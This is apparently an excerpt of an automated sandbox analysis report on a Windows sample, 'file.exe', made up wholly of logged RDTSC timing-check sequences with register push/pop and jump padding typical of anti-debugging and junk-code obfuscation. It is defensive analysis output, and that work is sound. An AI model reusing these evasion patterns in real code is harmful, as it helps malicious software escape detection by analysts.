                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DDE second address: 1114DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DE2 second address: 1114DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DE8 second address: 1114DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F863914EA2Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114DF7 second address: 1114E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F86385196D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1115082 second address: 1115086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1115086 second address: 111508A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111508A second address: 1115090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118632 second address: 1118636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1118636 second address: 111863E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111863E second address: 111865C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F86385196E9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11187D8 second address: 11187F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA2Fh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111910F second address: 1119119 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F86385196DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A957 second address: 111A95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A95B second address: 111A95F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A95F second address: 111A96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A96B second address: 111A971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A971 second address: 111A976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A976 second address: 111A97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A97C second address: 111A982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A982 second address: 111A986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120EDC second address: 1120EE2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120EE2 second address: 1120F2A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F86385196D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F86385196E0h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 jmp 00007F86385196E2h 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jmp 00007F86385196DCh 0x0000001f je 00007F86385196D6h 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A915 second address: 112A938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F863914EA38h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128AF9 second address: 1128B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F86385196DBh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128B0B second address: 1128B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA38h 0x00000007 jc 00007F863914EA26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F863914EA2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F863914EA33h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128B4E second address: 1128B5E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128B5E second address: 1128B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128B64 second address: 1128B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128B68 second address: 1128B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128CA6 second address: 1128CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F86385196D6h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128CB4 second address: 1128CBE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F863914EA26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128F96 second address: 1128F9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128F9B second address: 1128FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128FA4 second address: 1128FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11297FA second address: 11297FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1129977 second address: 112997C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112997C second address: 1129982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1129982 second address: 112998C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112998C second address: 11299B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F863914EA26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F863914EA34h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 js 00007F863914EA63h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11299B8 second address: 11299C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11299C7 second address: 11299DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F863914EA32h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128689 second address: 112868D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112868D second address: 11286BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA36h 0x00000007 jmp 00007F863914EA31h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130174 second address: 113017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C08C second address: 113C0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F863914EA35h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EE58 second address: 113EE6B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F86385196D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EE6B second address: 113EE71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EE71 second address: 113EE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F86385196DBh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EA57 second address: 113EA5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11442E2 second address: 11442F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F86385196DEh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11442F5 second address: 11442FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11442FA second address: 1144306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F86385196D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144306 second address: 114430C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114430C second address: 114432F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F86385196E2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jne 00007F86385196D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114432F second address: 1144351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F863914EA38h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144351 second address: 1144359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143FC5 second address: 1143FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F863914EA30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143FD9 second address: 1143FDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1143FDD second address: 1144003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F863914EA26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F863914EA38h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149C0C second address: 1149C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E442 second address: 114E456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F863914EA30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E456 second address: 114E46C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F86385196D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jno 00007F86385196D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E46C second address: 114E483 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F863914EA2Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B369 second address: 115B36F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B504 second address: 115B51D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F863914EA32h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B832 second address: 115B843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F86385196D6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B843 second address: 115B878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F863914EA37h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F863914EA2Dh 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B878 second address: 115B87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B9A3 second address: 115B9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B9A7 second address: 115B9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F86385196D6h 0x0000000d jnl 00007F86385196D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B9BC second address: 115B9C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B9C2 second address: 115B9CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B9CD second address: 115B9D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115C79C second address: 115C7B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160D93 second address: 1160D99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160D99 second address: 1160D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160D9F second address: 1160DC7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F863914EA2Fh 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jng 00007F863914EA26h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160DC7 second address: 1160DD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160DD0 second address: 1160DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D9F9 second address: 116DA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F86385196D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116DA05 second address: 116DA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116DA0F second address: 116DA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F86385196DDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116DA27 second address: 116DA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168829 second address: 1168833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117A659 second address: 117A674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F863914EA36h 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117A513 second address: 117A51F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117A51F second address: 117A523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117A523 second address: 117A532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117A532 second address: 117A539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D5BF second address: 117D5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C10A second address: 118C11E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F863914EA26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F863914EA28h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C274 second address: 118C28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007F86385196E2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C3D6 second address: 118C403 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F863914EA26h 0x00000008 jp 00007F863914EA26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F863914EA37h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C403 second address: 118C41C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F86385196E4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C9F1 second address: 118C9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F863914EA26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C9FB second address: 118CA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119151C second address: 119152E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119152E second address: 1191538 instructions: 0x00000000 rdtsc 0x00000002 js 00007F86385196DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191790 second address: 11917A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F863914EA26h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F863914EA26h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11917A7 second address: 11917AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11918D5 second address: 11918DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
